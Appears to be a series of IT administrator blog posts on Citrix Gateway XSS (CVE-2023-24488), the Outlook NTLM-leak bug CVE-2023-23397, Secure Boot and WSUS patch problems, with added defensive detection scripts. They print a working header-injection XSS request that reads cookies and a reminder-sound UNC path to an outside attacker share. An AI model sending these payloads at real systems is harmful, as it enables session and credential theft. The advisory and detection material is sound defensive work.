by butsch
2. July 2023 23:42
02.07.2023
An attacker is able to change the redirection of the LOGOUT page. To date we are unsure whether this only applies if you use SAML, as in the NOV 2022 exploit.
GET /oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1
Pre Authentication XSS in Citrix Gateway (CVE-2023-24488)
The URL query parameters are not sufficiently sanitized before being inserted into the HTTP Location header. An attacker can exploit this to craft a link that, when clicked, redirects the victim to an arbitrary location. Alternatively, the attacker can insert line-break characters into the Location header to terminate the HTTP headers early and inject an XSS payload into the response body.
Impact: An attacker can craft malicious links that, when clicked, either redirect the victim to a website under the attacker's control or execute JavaScript in the victim's browser.
Affected software: The following versions are affected by this vulnerability:
- Citrix ADC and Citrix Gateway 13.1 before 13.1-45.61
- Citrix ADC and Citrix Gateway 13.0 before 13.0-90.11
- Citrix ADC and Citrix Gateway 12.1 before 12.1-65.35
- Citrix ADC 12.1-FIPS before 12.1-55.296
- Citrix ADC 12.1-NDcPP before 12.1-55.296
Product description: Citrix Gateway is a network appliance that provides various functions, including remote-access VPN services.
Solution: Update to the latest version of Citrix Gateway.
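As an added example (not from the post and not Citrix code), this shows the two defender-side pieces of the issue described above: how a hardened logout handler must validate post_logout_redirect_uri before copying it into a Location header, and a sweep over access logs for requests that such a handler would reject; the log lines and host names are constructed.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed access-log lines in common log format (not taken from the page or a real appliance).
SAMPLE_LOG = """\
203.0.113.7 - - [02/Jul/2023:10:01:12 +0200] "GET /oauth/idp/logout?post_logout_redirect_uri=https%3A%2F%2Fportal.example.com%2Fbye HTTP/1.1" 302 0
203.0.113.9 - - [02/Jul/2023:10:02:44 +0200] "GET /oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 302 0
203.0.113.9 - - [02/Jul/2023:10:03:01 +0200] "GET /oauth/idp/logout?post_logout_redirect_uri=https%3A%2F%2Fattacker.example.net%2F HTTP/1.1" 302 0
203.0.113.10 - - [02/Jul/2023:10:04:20 +0200] "GET /vpn/index.html HTTP/1.1" 200 1834
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
CONTROL_RE = re.compile(r"[\x00-\x1f\x7f]")   # CR, LF and any other control character


def redirect_problem(raw_value, allowed_hosts):
    """Check a percent-encoded post_logout_redirect_uri value the way a hardened
    logout handler should before copying it into a Location header.
    Returns None if the value is acceptable, otherwise a short reason."""
    decoded = unquote(raw_value)  # exactly one decoding pass, as the server performs
    if CONTROL_RE.search(decoded):
        return "control characters (header injection)"
    parts = urlsplit(decoded)
    # Require an absolute https URL whose full authority (including any user@ or :port)
    # is on the allow-list; anything else is an open redirect.
    if parts.scheme != "https" or parts.netloc.lower() not in allowed_hosts:
        return "redirect target not in allow-list"
    return None


def raw_query_values(query, name):
    """Yield the still-encoded values of one query parameter (no decoding here, so
    the value is decoded exactly once, in redirect_problem)."""
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            yield value


def find_suspicious_logout_requests(log_text, allowed_hosts):
    """Return (line_no, reason) for every /oauth/idp/logout request whose redirect
    parameter a hardened handler would have rejected."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if url.path != "/oauth/idp/logout":
            continue
        for value in raw_query_values(url.query, "post_logout_redirect_uri"):
            reason = redirect_problem(value, allowed_hosts)
            if reason:
                findings.append((line_no, reason))
    return findings


if __name__ == "__main__":
    for line_no, reason in find_suspicious_logout_requests(SAMPLE_LOG, {"portal.example.com"}):
        print(f"line {line_no}: {reason}")
```

Logs often keep the URI percent-encoded, which is why the sweep decodes the parameter itself instead of grepping for a literal line break.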
LINK CITRIX:
Citrix ADC and Citrix Gateway Security Bulletin for CVE-2023-24487, CVE-2023-24488
https://support.citrix.com/article/CTX477714/citrix-adc-and-citrix-gateway-security-bulletin-for-cve202324487-cve202324488
From the Citrix bulletin:
Applicable products: Citrix ADC, Citrix Gateway. Description of the problem: Vulnerabilities have been discovered in the Citrix ADC and Citrix Gateway versions listed below which, if exploited, could lead to the following security issues:
Affected products, versions and components: The following supported versions of Citrix ADC and Citrix Gateway are affected by this vulnerability:
- Citrix ADC and Citrix Gateway 13.1 before 13.1-45.61
- Citrix ADC and Citrix Gateway 13.0 before 13.0-90.11
- Citrix ADC and Citrix Gateway 12.1 before 12.1-65.35
- Citrix ADC 12.1-FIPS before 12.1-55.296
- Citrix ADC 12.1-NDcPP before 12.1-55.296
This bulletin only applies to customer-managed Citrix ADC and Citrix Gateway installations. Customers using Citrix-managed cloud services or Citrix-managed Adaptive Authentication do not need to take any action.
Vulnerability table (CVE ID, description, prerequisites, CWE, CVSS):
- CVE-2023-24488: Cross-Site Scripting. Prerequisites: the appliance must be configured as a Gateway (SSL VPN, ICA Proxy, CVPN, RDP Proxy) or AAA virtual server. CWE-79, CVSS 6.1
- CVE-2023-24487: Arbitrary file read. Prerequisites: access to NSIP or SNIP with management interface access. CWE-253, CVSS 6.3
What customers should do: Affected Citrix ADC and Citrix Gateway customers should install the relevant updated versions of Citrix ADC or Citrix Gateway as soon as possible:
- Citrix ADC and Citrix Gateway 13.1-45.61 and later releases
- Citrix ADC and Citrix Gateway 13.0-90.11 and later releases of 13.0
- Citrix ADC and Citrix Gateway 12.1-65.35 and later releases of 12.1
- Citrix ADC 12.1-FIPS 12.1-55.296 and later releases of 12.1-FIPS
- Citrix ADC 13.1-FIPS 13.1-37.150 and later releases of 13.1-FIPS
- Citrix ADC 12.1-NDcPP 12.1-55.296 and later releases of 12.1-NDcPP
Acknowledgements: Citrix thanks Petr Juhanak of Accenture, Dylan Pindur of Assetnote and Wisdomtree of the Ant Group Digital Financial Security Team for working together to protect Citrix customers.
What Citrix is doing: Citrix is notifying customers and channel partners about this potential security issue through the publication of this security bulletin on the Citrix Knowledge Center at https://support.citrix.com/securitybulletins.
Obtaining support on this issue: If you require technical assistance with this issue, please contact Citrix Technical Support. Contact details for Citrix Technical Support are available at https://www.citrix.com/support/open-a-support-case.
The official Citrix security bulletin can be found here.
by butsch
15. March 2023 03:00
CVE-2023-23397, what is exploited:
Instead of the standard Microsoft Outlook sound, a custom sound can be specified for a meeting reminder. This sound can be located on a share. That is the crux of the problem.
https://learn.microsoft.com/de-de/office/client-developer/outlook/mapi/pidlidreminderoverride-canonical-property
https://www.forbes.com/sites/daveywinder/2023/03/15/microsoft-outlook-warning-critical-new-email-exploit-triggers-automatically-update-now/?sh=47f058ce6e5e
CVE-2023-23397 is an Outlook bug. If you send an incoming e-mail for an appointment with a custom reminder (sound, attribute PidLIDReminder), Outlook.exe (2012/2016) will try to retrieve the sound file via SMB, even from an external share (without regard for the site zones in IE/Edge/the system). If port 445 is open towards that target, the system sends an NTLM hash outside your network. As we understand it, most existing AV solutions for on-premise Exchange currently cannot scan this PidLIDReminder attribute (Trend, Trellix Security for Exchange). That is why the MS Exchange team provided the script.

Here you can specify a custom sound for an APPOINTMENT.
E.g. alarm "\\213.145.33.11\attacker_ldap_scanner_hash\M365_Ausfall_Nichts_geht_mehr_alle_user_Ferien.wav"
PRIO1
is to install the Outlook.exe patch and restart the clients, and also to make sure customers do not open SMB for external connections. This is usually closed from the client VLAN > WAN. The tricky cases are home office and remote workers who, depending on split VPN, would have 445/SMB open.
Patches for Outlook 2013/2016:
https://support.microsoft.com/kb/5002254
2016 Direct download
https://www.catalog.update.microsoft.com/Search.aspx?q=outlook%202016 (All Outlook 2016 Patches, pick the ones from 14.03.2023)
https://catalog.s.download.windowsupdate.com/c/msdownload/update/software/secu/2023/02/outlook-x-none_a3461e8b8424793e267728be32cd83c294ebb897.cab (32BIT)
https://catalog.s.download.windowsupdate.com/c/msdownload/update/software/secu/2023/02/outlook-x-none_8d949e375d119c72a375435cd77a4797fb2e0b2b.cab (64BIT)
2013 Direct download
https://www.catalog.update.microsoft.com/Search.aspx?q=outlook%202013 (All Outlook 2013 Patches, pick the ones from 14.03.2023)
https://catalog.s.download.windowsupdate.com/c/msdownload/update/software/secu/2023/02/outlook-x-none_2cb1193a28972b39546f59d104ae5be489c01d8d.cab (64BIT)
https://catalog.s.download.windowsupdate.com/c/msdownload/update/software/secu/2023/02/outlook-x-none_2e7b2f55dcab1fd7d3b00aa1dbd2545fb90e435c.cab (32BIT)
Manual installation: unpack the CAB files and THEN double-click the .MSP patch file.

Deployment outside of WSUS: the .CAB files can be installed from the command line like this:
DISM.EXE does not seem to work for the Office CAB files.
But you can open the file and then simply install the MSP file. Windows Installer searches for and finds the rest, e.g. the source of the Office files.
msiexec /p C:\edv\outlook-x-none_a3461e8b8424793e267728be32cd83c294ebb897\outlook-x-none.msp /qb
msiexec /p C:\edv\outlook-x-none_a3461e8b8424793e267728be32cd83c294ebb897\outlook-x-none.msp /qn

DISM.EXE does not seem to work for the Office CAB files:
https://social.technet.microsoft.com/Forums/lync/en-US/683d7d72-b296-419f-b585-becd5d99b37f/dism-offline-update-error-0x80070002
dism /Online /Add-Package /PackagePath:"c:\edv\outlook-x-none_a3461e8b8424793e267728be32cd83c294ebb897.cab"
Depending on the system this gives an error because it does not have the required underlying CBS package:
Failed to get the underlying CBS package. - CDISMPackageManager::OpenPackageByPath(hr:0x80070002)
Usually with other CAB packages these are included in the CAB/archive; here they are not, e.g. for Outlook 2016 on W11 22H2.
Example file from 202X: there you first had to install the SSU and then the patch with DISM.

With the current Outlook patch, however, only an MSP is included.

2016/W11

2023-03-16 10:46:42, Info DISM DISM Package Manager: PID=18624 TID=15128 Processing the top level command token(add-package). - CPackageManagerCLIHandler::Private_ValidateCmdLine
2023-03-16 10:46:42, Info DISM DISM Package Manager: PID=18624 TID=15128 Attempting to route to appropriate command handler. - CPackageManagerCLIHandler::ExecuteCmdLine
2023-03-16 10:46:42, Info DISM DISM Package Manager: PID=18624 TID=15128 Routing the command... - CPackageManagerCLIHandler::ExecuteCmdLine
2023-03-16 10:46:42, Info DISM DISM Package Manager: PID=18624 TID=15128 Encountered the option "packagepath" with value "c:\edv\outlook-x-none_a3461e8b8424793e267728be32cd83c294ebb897.cab" - CPackageManagerCLIHandler::Private_GetPackagesFromCommandLine
2023-03-16 10:46:42, Error DISM DISM Package Manager: PID=18624 TID=15128 Failed opening package. - CDISMPackageManager::Internal_CreatePackageByPath(hr:0x80070002)
2023-03-16 10:46:42, Error DISM DISM Package Manager: PID=18624 TID=15128 Failed to get the underlying CBS package. - CDISMPackageManager::OpenPackageByPath(hr:0x80070002)
2023-03-16 10:46:42, Error DISM DISM Package Manager: PID=18624 TID=15128 Failed to open the package at location: "c:\edv\outlook-x-none_a3461e8b8424793e267728be32cd83c294ebb897.cab" - CPackageManagerCLIHandler::ProcessPackagePath(hr:0x80070002)
2023-03-16 10:46:42, Error DISM DISM Package Manager: PID=18624 TID=15128 Failed to get the count of packages from the command line. - CPackageManagerCLIHandler::ProcessCmdLine_AddPackage(hr:0x80070002)
2023-03-16 10:46:42, Error DISM DISM Package Manager: PID=18624 TID=15128 Failed while processing command add-package. - CPackageManagerCLIHandler::ExecuteCmdLine(hr:0x80070002)
2023-03-16 10:46:42, Info DISM DISM Package Manager: PID=18624 TID=15128 Further logs for online package and feature related operations can be found at %WINDIR%\logs\CBS\cbs.log - CPackageManagerCLIHandler::ExecuteCmdLine
2023-03-16 10:46:42, Error DISM DISM.EXE: DISM Package Manager processed the command line but failed. HRESULT=80070002
The Patch info from WSUS.

PRIO2
is FORENSICS: to find out whether you have received such e-mails and hopefully to prevent them from being delivered to Outlook.exe. You can also repair those that have already arrived. If you are on-premise, check whether your Exchange AV solution can look for the attribute (the Exchange AV solution already has all the rights that you would otherwise have to grant separately to run the script; the only question is WHETHER it finds the attribute with the current version).
Important for the PRIO 2 SCRIPT: we recommend this only for people who have experience with such commands, e.g. from integrating an archiving solution or a mobile device management (MDM) solution. You may also have to consult your in-house legal/compliance team, since, as far as I understood, you are granting someone full access to the e-mails of your CEO and board (I have not reviewed the script in detail).
[https://microsoft.github.io/CSS-Exchange/Security/CVE-2023-23397/]
The script does the following:
- Generate an unlimited (full) throttling policy for a group or a user (like an MDM master account or an account feeding a legal archiving solution).
- Generate a rule so that one user has full access to every e-mail, calendar entry etc. stored in the Exchange environment (Application Impersonation / https://learn.microsoft.com/en-us/exchange/client-developer/exchange-web-services/impersonation-and-...).
- Scan all e-mails, or at least some days backwards; since Ukraine was attacked in 03/2022, so for a year? Or was that information wrong? Microsoft says here that you should scan particularly attractive targets (who is that supposed to be? The CEO/board or just the user?)
Action required 16.03.2023
Install the patch and make sure everyone has done the reboot
Make sure port 445/SMB from LAN>WAN is closed (possibly adjust the remote worker firewall GPO/policy, or do it via the FW module of e.g. the antivirus, e.g. McAfee ENS Firewall)
The PowerShell scripts currently circulating are intended exclusively for forensic purposes and for hunting indicators of compromise. These scripts require careful handling, however, since the script user has to be given full access to all resources, including the ability to regulate the script's throttling. So please do not run the script until we can make sure there are no problems due to language barriers.
It is important to note that the PowerShell script is not necessary to close the Outlook.exe vulnerability. It serves exclusively for forensic investigation and for replacing the 1-2% of calendar entries that have not yet been updated due to offline connections. It is unlikely, however, that these scripts will be required, since the first wave of the attack was carried out via an e-mail with a blocked attachment (.MSI).
Finally, it is important to emphasize that the Exchange patch from March 2023 has no effect on the Outlook.exe vulnerability.
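As an added example (not part of the post and not Microsoft's CSS-Exchange script), this is the core check such a forensic scan performs: flag calendar items whose custom reminder sound points to a UNC path on a host outside the organisation, which is what makes Outlook open the SMB connection described above; the items, address ranges and DNS suffix are constructed, and PidLidReminderFileParameter is the MAPI property that holds the sound path.

```python
import ipaddress
import re

# Constructed calendar items as a mailbox scan might export them (no real mailbox data).
# PidLidReminderOverride enables the custom sound; PidLidReminderFileParameter holds its path.
SAMPLE_ITEMS = [
    {"subject": "Weekly sync", "PidLidReminderOverride": False,
     "PidLidReminderFileParameter": None},
    {"subject": "Budget review", "PidLidReminderOverride": True,
     "PidLidReminderFileParameter": r"C:\Windows\Media\Alarm01.wav"},
    {"subject": "Town hall", "PidLidReminderOverride": True,
     "PidLidReminderFileParameter": r"\\fileserver.corp.example\media\chime.wav"},
    {"subject": "M365 outage", "PidLidReminderOverride": True,
     "PidLidReminderFileParameter": r"\\203.0.113.11\scanner\alert.wav"},
    {"subject": "All hands", "PidLidReminderOverride": True,
     "PidLidReminderFileParameter": "//10.20.30.40/media/ding.wav"},
]

# Assumed corporate address space; replace with your own ranges.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

UNC_RE = re.compile(r"^(?:\\\\|//)([^\\/]+)[\\/]")


def unc_host(path):
    """Return the lower-cased host of a UNC path (\\host\share\... or //host/share/...),
    or None for local paths and empty values."""
    if not path:
        return None
    m = UNC_RE.match(path.strip())
    return m.group(1).lower() if m else None


def is_internal_host(host, trusted_suffixes):
    """True for IP literals inside INTERNAL_NETS, for short names without a dot
    (resolved inside the LAN) and for names under a trusted DNS suffix."""
    try:
        ip = ipaddress.ip_address(host.strip("[]"))
        return any(ip in net for net in INTERNAL_NETS)
    except ValueError:
        pass  # not an IP literal, treat as a DNS name
    if "." not in host:
        return True
    return any(host == s or host.endswith("." + s) for s in trusted_suffixes)


def find_external_reminder_sounds(items, trusted_suffixes):
    """Return (subject, host) for every item whose custom reminder sound would make
    Outlook open an SMB connection to a host outside the organisation."""
    findings = []
    for item in items:
        if not item.get("PidLidReminderOverride"):
            continue
        host = unc_host(item.get("PidLidReminderFileParameter"))
        if host and not is_internal_host(host, trusted_suffixes):
            findings.append((item["subject"], host))
    return findings


if __name__ == "__main__":
    for subject, host in find_external_reminder_sounds(SAMPLE_ITEMS, ("corp.example",)):
        print(f"{subject!r}: reminder sound on external host {host}")
```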

Image: source ACEResponder/Twitter

Image: source MS Learn
Good blog:
https://practical365.com/cve-2023-23397-ntlm-vulnerability/ (not the source of the info)
by butsch
14. February 2023 16:12
Starting March 2023, Microsoft Edge will be the new Adobe Reader and Acrobat if you opt in
I just found some information while searching for more details on the 02/2023 Windows updates/patches. This is interesting because we mostly auto-update Defender and Edge, while we analyse and test all other monthly cumulative updates per customer and then approve them in a schema from small to big customers.
This has worked great over the last few months, where other companies that just auto-approve updates had problems.
Adobe is the company with the most PDF patents for advanced features in PDF files. All the free solutions offer only a part of that or pay licence fees to Adobe, as we understand it to date.
Starting in March, auto-approved Edge updates will include the Adobe Reader engine in MS Edge, and it seems that the Adobe Acrobat (Writer) licence will also be available via Edge. This eliminates the eternal discussion about the safest way to open PDFs from the web/e-mail (not in Chrome with the Adobe extension) and whether to use Reader, Acrobat (Writer) or the browser. It's all the same and takes the issue away.
Acrobat Writer updates were often delayed because they were 170-500 MB in size and didn't transfer quickly via Intune or on-premise deployment to laptops. So one product was sometimes the older one.
In addition, there was always the question of what to open .PDF files with. Adobe put a lot of work into Reader manuals and explanations for end users. Most of the time a single user in an enterprise wants it another way, and because he is from QA, IT changes the open-with procedure for all employees, often because their quality solution or add-on did not work with the Edge PDF engine.
Adobe and Microsoft have a new partnership to integrate the Adobe Reader engine into the MS Edge browser, as well as Adobe Sign (the digital signature) for the MS cloud products mentioned.
Eventually Adobe Reader will disappear and MS software should then direct Edge to display PDFs. No one knows what will happen to Chrome.exe. Google and Amazon are heavily against the Azure cloud and the new licensing model for Microsoft Server OS (as we understood it, it would be more expensive to run MS Server outside of Azure...).
LINKS:
https://www.adobe.com/sign/pricing/plans.html?plans=teams
https://www.adobe.com/documentcloud/integrations/microsoft.html
https://techcommunity.microsoft.com/t5/microsoft-edge-insider/microsoft-edge-and-adobe-partner-to-improve-the-pdf-experience/ba-p/3733481
That's exactly the kind of thing one wants to avoid:
https://helpx.adobe.com/de/acrobat/kb/chrome-extension-not-working.html
Some extracted info that seems interesting for us:
How do I use the advanced Adobe Acrobat PDF features in Microsoft Edge?
Activating the advanced features with the Adobe Acrobat PDF extension in Microsoft Edge requires a paid Adobe Acrobat subscription. To activate the features, in the PDF view in Microsoft Edge, navigate to the top right corner of the window and click the button with messaging to try the advanced features. From there follow the prompts best suiting your needs to complete the transaction. If you already have a paid Adobe Acrobat subscription, you can sign into your existing account to use the advanced features at no additional cost.
Can general users opt out of using Adobe Acrobat PDF capabilities in Microsoft Edge?
General users will be unable to revert to using the legacy PDF engine in Microsoft Edge after the Adobe Acrobat PDF engine launches.
How will this affect commercial organizations?
When rollout begins in March 2023, there will be no changes to managed Windows devices in organizations unless you choose to opt in. Users on unmanaged Windows devices will see an unobtrusive Adobe brand mark in the bottom corner of their PDF view. These users will also see an option to try the advanced features, such as converting PDFs, combining files, editing text and images. If an organization chooses to opt in, users on managed devices will see the same changes. The built-in Microsoft Edge PDF solution with the Adobe Acrobat PDF engine will have full feature parity with the legacy Microsoft Edge PDF solution. No functionality will be lost.

by butsch
15. August 2022 16:11
August 08/2022 Patch KB5012170 Update for Secure Boot DBX problem 0x800f0922
Problem: You can't install the August 2022 update KB5012170 on some systems under certain conditions where Secure Boot is enabled and the BIOS/UEFI firmware is not the latest. You will receive error 0x800f0922.
Error: Package KB5015730 failed to be changed to the Installed state. Status: 0x800f0922.


The patch does a revert

System which is not affected

The update fixes some Secure Boot problems, for example:
CVE-2022-34301 | Eurosoft Boot Loader Bypass
CVE-2022-34302 | New Horizon Data Systems Inc Boot Loader Bypass
CVE-2022-34303 | Crypto Pro Boot Loader Bypass
Microsoft main link:
KB5012170: Security update for Secure Boot DBX: August 9, 2022 (microsoft.com)
https://support.microsoft.com/en-us/topic/kb5012170-security-update-for-secure-boot-dbx-august-9-2022-72ff5eed-25b4-47c7-be28-c42bd211bb15
What does the KB describe:
It describes the problem that with certain firmware/BIOS and GPO settings KB5012170 will not install. The KB is very hard to understand. We try to help a little. Please keep in mind that you can't update firmware without checking compatibility on laptops for docking stations and maybe other things. In an enterprise you can't just update laptop firmware overnight and hope all is fine, like Microsoft thinks they can do with their M365/Azure solution and Autopilot clients. ;-)
Keypoint / problem:
If BitLocker Group Policy Configure TPM platform validation profile for native UEFI firmware configurations is enabled and PCR7 is selected by policy, it may result in the update failing to install.
So what does that mean if you don't have a post doc in IT?
Check whether you are affected and have PCR7 active
You can find out the status of your UEFI / PCR7 / BitLocker setup with MSINFO32.exe (elevated) and/or by running a DOS or PS command.
Some sample dumps and how to find out:
Affected product which has PCR7 mode shown:
Dell computer Precision 5530, Windows 10 21H2
msinfo32.exe commandline
shows:
Sicherer Startzustand Ein
PCR7-Konfiguration Gebunden
DOS: manage-bde -protectors -get c:
Shows:

Automate checking client for PCR7:
You may use a) your software deployment, b) PsExec from Sysinternals; c) do not use GPO to deploy software if you are not 100% fireproof with scripting.
With PsExec:
PsExec - Windows Sysinternals | Microsoft Docs
psexec -s \\computer001 c:\windows\system32\manage-bde.exe -protectors -get c:
PsExec v2.4 - Execute processes remotely
Copyright (C) 2001-2022 Mark Russinovich
Sysinternals - www.sysinternals.com
BitLocker-Laufwerkverschlüsselung: Konfigurationstool, Version 10.0.19041
Copyright (C) 2013 Microsoft Corporation. Alle Rechte vorbehalten.
Volume "C:" [Windows]
Alle Schlüsselschutzvorrichtungen
Numerisches Kennwort:
ID: {6E770EF9-56D2-430D-81SAFE82-0E9A555D3D8A9}
Kennwort:
448404-317438-3449504-5442264-159SAFE764-262257-273570-253165
TPM:
ID: {9BE23A51-4A8B-4649-98SAFEDE-FAD6FB7165B9}
PCR-Validierungsprofil:
7, 11
(Verwendet den sicheren Start für die Integritätsüberprüfung)
c:\windows\system32\manage-bde.exe exited on pen10nb014 with error code 0.
Automate msinfo32.exe with PsExec
psexec -s \\computer001 C:\windows\system32\msinfo32.exe /nfo c:\edv\00_report\computer.txt /report c:\edv\00_report\computer_re.txt
Description of Microsoft System Information (Msinfo32.exe) Tool
c:\edv\00_report\computer_re.txt
Systeminformationsbericht erstellt am: 08/15/22 13:51:16
Systemname: SBBCARW10EL0145
[Systemübersicht]
Element Wert
Betriebsystemname Microsoft Windows 10 Enterprise
Version 10.0.19042 Build 19042
Weitere Betriebsystembeschreibung Nicht verfügbar
Betriebsystemhersteller Microsoft Corporation
Systemname PEN10NB014
Systemhersteller Dell Inc.
Systemmodell Precision 5530
Systemtyp x64-basierter PC
System-SKU 087D
Prozessor Intel(R) Core(TM) i9-8950HK CPU @ 2.90GHz, 2904 MHz, 6 Kern(e), 12 logische(r) Prozessor(en)
BIOS-Version/-Datum Dell Inc. 1.12.0, 27.06.2019
SMBIOS-Version 3.1
Version des eingebetteten Controllers 255.255
BIOS-Modus UEFI
BaseBoard-Hersteller Dell Inc.
BaseBoard-Produkt 0FP2W2
BaseBoard-Version A00
Plattformrolle Mobil
Sicherer Startzustand Ein
PCR7-Konfiguration Gebunden
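An added example (not from the post) that turns the collected manage-bde and msinfo32 output into a verdict per client: PCR 7 in the TPM validation profile, or "Gebunden"/"Bound" in the msinfo32 report, is the case the KB warns about. The excerpts are constructed after the dumps above, and the parser accepts the German strings shown there as well as their English Windows equivalents.

```python
import re

# Constructed excerpts modelled on the manage-bde / msinfo32 dumps above (German Windows);
# English Windows strings are included so the same parser serves a mixed fleet.
MANAGE_BDE_DE = """\
Volume "C:" [Windows]
Alle Schlüsselschutzvorrichtungen
TPM:
ID: {00000000-0000-0000-0000-000000000000}
PCR-Validierungsprofil:
7, 11
(Verwendet den sicheren Start für die Integritätsüberprüfung)
"""
MANAGE_BDE_EN = """\
Volume C: [OSDisk]
All Key Protectors
TPM:
ID: {00000000-0000-0000-0000-000000000000}
PCR Validation Profile:
0, 2, 4, 11
"""
MANAGE_BDE_NO_TPM = """\
Volume C: [OSDisk]
All Key Protectors
Numerical Password:
ID: {00000000-0000-0000-0000-000000000000}
"""
MSINFO_DE = "Sicherer Startzustand\tEin\nPCR7-Konfiguration\tGebunden\n"
MSINFO_EN = "Secure Boot State\tOff\nPCR7 Configuration\tBinding Not Possible\n"

PROFILE_RE = re.compile(
    r"PCR[ -]?(?:Validation Profile|Validierungsprofil):\s*([\d, ]+)", re.I)
PCR7_RE = re.compile(r"PCR7[ -]?(?:Configuration|Konfiguration)\s+(.+)", re.I)
PCR7_BOUND = {"bound", "gebunden"}


def pcr_profile(manage_bde_output):
    """PCR indexes the TPM protector validates, or None when there is no TPM protector
    (BitLocker off, legacy BIOS, or only a password/recovery protector)."""
    m = PROFILE_RE.search(manage_bde_output)
    if not m:
        return None
    return [int(x) for x in m.group(1).split(",") if x.strip()]


def pcr7_state(msinfo_report):
    """The 'PCR7 Configuration' value of an msinfo32 report, lower-cased, or None."""
    m = PCR7_RE.search(msinfo_report)
    return m.group(1).strip().lower() if m else None


def kb5012170_risk(manage_bde_output, msinfo_report=""):
    """'affected' when the TPM protector includes PCR 7 (the failure case the KB describes)
    or msinfo32 reports PCR7 as Bound/Gebunden; otherwise 'not affected'."""
    profile = pcr_profile(manage_bde_output)
    if profile is not None and 7 in profile:
        return "affected"
    if pcr7_state(msinfo_report) in PCR7_BOUND:
        return "affected"
    return "not affected"


if __name__ == "__main__":
    for name, bde, info in (("dell-5530", MANAGE_BDE_DE, MSINFO_DE),
                            ("hp-800-g3", MANAGE_BDE_NO_TPM, ""),
                            ("other", MANAGE_BDE_EN, MSINFO_EN)):
        print(f"{name}: PCRs={pcr_profile(bde)} PCR7={pcr7_state(info)} -> {kb5012170_risk(bde, info)}")
```

Feed it the files that the PsExec commands above write per computer; the verdict is what decides whether the BitLocker suspend workaround from the KB is needed before deploying the update.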
Other samples not affected:
An HP EliteDesk 800 G3 (older) with a non-UEFI BIOS
Binding not possible because it is an older machine and NOT a UEFI BIOS (Legacy is used) for better OS deployment reasons.
DOS: manage-bde -protectors -get c:

PS:

Msinfo32.exe

A newer home system, HP EliteDesk with UEFI, no BitLocker To Go or BitLocker active (out-of-the-box end-user system)
BINDING POSSIBLE
manage-bde -protectors -get c:

Below you see under PCR7 that if you did NOT run msinfo32 as "Administrator/Elevated", it says "Elevation required to view".


Here is msinfo32.exe run as admin: PCR7 binding would be possible but is not activated

You can see that on this specific machine, where PCR7 "Binding Possible" is shown, there is no BitLocker. That's why the patch installed even without the firmware update that HP offered.
Solution
- Check that you have the latest Bios/Firmware
- Check if you have PCR7 enabled like mentioned above
If that is not possible > for example because your docking station is not compatible with the latest firmware
To work around this issue, do one of the following before you deploy this update:
On a device that does not have Credential Guard enabled, run the following command from an Administrator command prompt to suspend BitLocker for 1 restart cycle:
Manage-bde -Protectors -Disable C: -RebootCount 1
Then, deploy the update and restart the device to resume the BitLocker protection.
On a device that has Credential Guard enabled, run the following command from an Administrator command prompt to suspend BitLocker for 2 restart cycles:
Manage-bde -Protectors -Disable C: -RebootCount 3
Then, deploy the update and restart the device to resume the BitLocker protection.
Some further links and info regarding the patch:
ADV200011 - Security Update Guide - Microsoft - Microsoft Guidance for Addressing Security Feature Bypass in GRUB
Troubleshoot the TPM (Windows) - Windows security | Microsoft Docs
R730xd, BitLocker, Secure Boot, PCR7 issue - Dell Community
Windows Server shows PCR7 configuration as "Binding not possible" - Windows Server | Microsoft Docs
Windows Server shows PCR7 configuration as "Binding not possible"
Article, 02/24/2022
This article introduces the Binding not possible issue in msinfo32 and the cause of the issue. This applies to both Windows clients and Windows Server.
PCR7 Configuration in msinfo32
Consider the following scenario:
Windows Server is installed on a secure boot-enabled platform.
You enable Trusted Platform Module (TPM) 2.0 in Unified Extensible Firmware Interface (UEFI).
You turn on BitLocker.
You install chipset drivers and update the latest Microsoft Monthly Rollup.
You also run tpm.msc to make sure that the TPM status is fine. The status displays The TPM is ready for use.
In this scenario, when you run msinfo32 to check the PCR7 Configuration, it's displayed as Binding not possible.
by butsch
28. July 2022 17:09
Event ID 7053,12072,12052,12042,12012,13042 on WSUS Server
ERROR:
Unable to open the WSUS MMC or connect with scripts/PS/tools to the WSUS database. On clients or servers you see an error when this happens because the WSUS app pool on IIS is down.
What is the problem?
If this happens, after a reboot of the server you will lose most of the APPROVAL or DENY decisions on your WSUS going back years.
Solution:
Mostly (90%) related to the RAM memory the WSUS has and the WSUS application pool itself, or you run out of space on your WSUS content drive.
Prelude:
In the past months, all long-running WSUS servers, no matter which OS they run on, seem to crash more often than they did before. We watched for a long time and first thought this was sporadically related to:
- Multiple use of the MMC console (several users checking WSUS)
- Space on the D: drive (with all the Feature Updates you are up to 1 TB soon)
- A script we had running to maintain WSUS, or rather to clean up WSUS automatically, crashed again (deny 12'000 patches…)
- We also assumed it was caused by a mix of WID (Windows Internal DB) / different versions of SQL Express or STD (we updated some mixed-use WSUS + EPO 5.10 to SQL 2017)
- As always, maybe AV solutions, which pinpoint this. But we use McAfee ENS Endpoint with many exceptions and it never blocked SQL or WID when configured right and not by beginners
None of that seemed to be the source of the problem.
It looks like the crashes are more often related to the memory handling of IIS application pools and the total memory the host (VM) has.
Here are the errors we did see:
Event ID 7053, Application
The WSUS administration console has encountered an unexpected error. This may be a transient error; try restarting the administration console. If this error persists,
Try removing the persisted preferences for the console by deleting the wsus file under %appdata%\Microsoft\MMC\.
System.NullReferenceException -- Object reference not set to an instance of an object.
Source: Microsoft.UpdateServices.UI.SnapIn
Stack Trace: at Microsoft.UpdateServices.UI.SnapIn.Scope.ServerSummaryScopeNode.ResetScopeNode()
Event ID 12072/12052/12042/12012/13042, Application, Windows Server Update Services
The Server Synchronization Web Service is not working.
The WSUS content directory is not accessible.
System.Net.WebException: The remote server returned an error: (503) Server Unavailable.
at System.Net.HttpWebRequest.GetResponse()
at Microsoft.UpdateServices.Internal.HealthMonitoring.HmtWebServices.CheckContentDirWebAccess(EventLoggingType type, HealthEventLogger logger)
The DSS Authentication Web Service is not working.
